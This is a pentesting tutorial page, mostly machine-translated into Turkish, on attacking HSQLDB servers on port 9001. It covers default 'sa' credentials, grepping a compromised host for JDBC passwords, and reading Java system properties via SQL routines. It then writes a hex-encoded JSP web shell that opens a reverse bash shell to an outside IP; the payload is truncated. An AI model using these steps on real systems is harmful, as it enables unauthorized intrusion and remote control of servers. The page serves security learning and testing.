9001 - Pentesting HSQLDB

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Temel Bilgiler

HSQLDB (HyperSQL DataBase), Java ile yazılmış önde gelen SQL ilişkisel veritabanı sistemidir. Bellek içi ve disk tabanlı tablolarla küçük, hızlı çok iş parçacıklı ve işlem tabanlı bir veritabanı motoru sunar ve gömülü ve sunucu modlarını destekler.

Varsayılan port: 9001

9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)

Bilgi

Varsayılan Ayarlar

Bu hizmetin varsayılan olarak muhtemelen bellekte çalıştığını veya localhost'a bağlı olduğunu unutmayın. Eğer bunu bulduysanız, muhtemelen başka bir hizmeti istismar ettiniz ve yetkileri artırmaya çalışıyorsunuzdur.

Varsayılan kimlik bilgileri genellikle sa ve boş bir şifre ile gelir.

Eğer başka bir hizmeti istismar ettiyseniz, olası kimlik bilgilerini aramak için

grep -rP 'jdbc:hsqldb.*password.*' /path/to/search

Not: Veritabanı adını dikkatlice not edin - bağlanmak için buna ihtiyacınız olacak.

Bilgi Toplama

DB örneğine bağlanmak için HSQLDB'yi indirin ve hsqldb/lib/hsqldb.jar dosyasını çıkarın. GUI uygulamasını (eww) java -jar hsqldb.jar komutuyla çalıştırın ve keşfedilen/zayıf kimlik bilgilerini kullanarak örneğe bağlanın.

Bağlantı URL'sinin uzaktan bir sistem için şöyle görüneceğini unutmayın: jdbc:hsqldb:hsql://ip/DBNAME.

Hileler

Java Dili Rutinleri

HSQLDB'den Java sınıfının statik yöntemlerini çağırabiliriz. Çağrılan sınıfın uygulamanın classpath'inde olması gerektiğini unutmayın.

JRT'ler fonksiyonlar veya prosedürler olabilir. Java yöntemi bir veya daha fazla SQL uyumlu ilkel değişken döndürüyorsa, fonksiyonlar SQL ifadeleri aracılığıyla çağrılabilir. VALUES ifadesi kullanılarak çağrılırlar.

Çağırmak istediğimiz Java yöntemi void döndürüyorsa, CALL ifadesi ile çağrılan bir prosedür kullanmamız gerekir.

Java Sistem Özelliklerini Okuma

Fonksiyon oluştur:

CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'

Execute function:

VALUES(getsystemproperty('user.name'))

You can find a list of system properties here.

Write Content to File

com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename Java aracı, özel bir prosedür aracılığıyla disk'e hex kodlu öğeler yazmak için JDK'da (uygulamanın sınıf yoluna otomatik olarak yüklendi) kullanılabilir. Maksimum boyutun 1024 bayt olduğunu unutmayın.

Prosedür oluşturun:

CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'

Prosedürü çalıştır:

call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Previous9000 - Pentesting FastCGI Next9042/9160 - Pentesting Cassandra

Last updated 3 days ago